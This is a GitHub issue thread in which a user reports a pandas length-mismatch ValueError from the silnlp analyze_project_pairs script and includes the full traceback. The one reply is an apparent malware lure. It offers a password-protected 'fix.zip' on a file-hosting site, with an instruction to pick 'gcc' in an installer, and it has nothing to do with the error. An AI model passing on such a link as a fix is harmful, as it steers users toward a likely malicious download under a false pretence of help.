### ISSUE TITLE
Error running analyse_project_pairs.

### ISSUE THREAD

**Issue by davidbaines** [sillsdev/silnlp#498]
When running the silnlp.nmt.analyze_project_pairs script for an experiment for the first time this error occurs. It collected the verse counts and seems to have calculated the alignments for the first five pairs, but not for the remaining forty three pairs.

Traceback (most recent call last):
  File "C:\Python38\lib\runpy.py", line 194, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Python38\lib\runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "F:\GitHub\silnlp\silnlp\nmt\analyze_project_pairs.py", line 519, in <module>
    main()
  File "F:\GitHub\silnlp\silnlp\nmt\analyze_project_pairs.py", line 501, in main
    get_corpus_stats(config, args.recalculate, args.deutero)
  File "F:\GitHub\silnlp\silnlp\nmt\analyze_project_pairs.py", line 89, in get_corpus_stats
    pair_stats["idx"] = corpus.index
  File "C:\Users\David\AppData\Local\pypoetry\Cache\virtualenvs\silnlp-X71j0jgb-py3.8\lib\site-packages\pandas\core\frame.py", line 3655, in __setitem__  
    self._set_item(key, value)
  File "C:\Users\David\AppData\Local\pypoetry\Cache\virtualenvs\silnlp-X71j0jgb-py3.8\lib\site-packages\pandas\core\frame.py", line 3832, in _set_item    
    value = self._sanitize_column(value)
  File "C:\Users\David\AppData\Local\pypoetry\Cache\virtualenvs\silnlp-X71j0jgb-py3.8\lib\site-packages\pandas\core\frame.py", line 4535, in _sanitize_column
    com.require_length_match(value, self.index)
  File "C:\Users\David\AppData\Local\pypoetry\Cache\virtualenvs\silnlp-X71j0jgb-py3.8\lib\site-packages\pandas\core\common.py", line 557, in require_length_match
    raise ValueError(
ValueError: Length of values (10041) does not match length of index (10159)

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
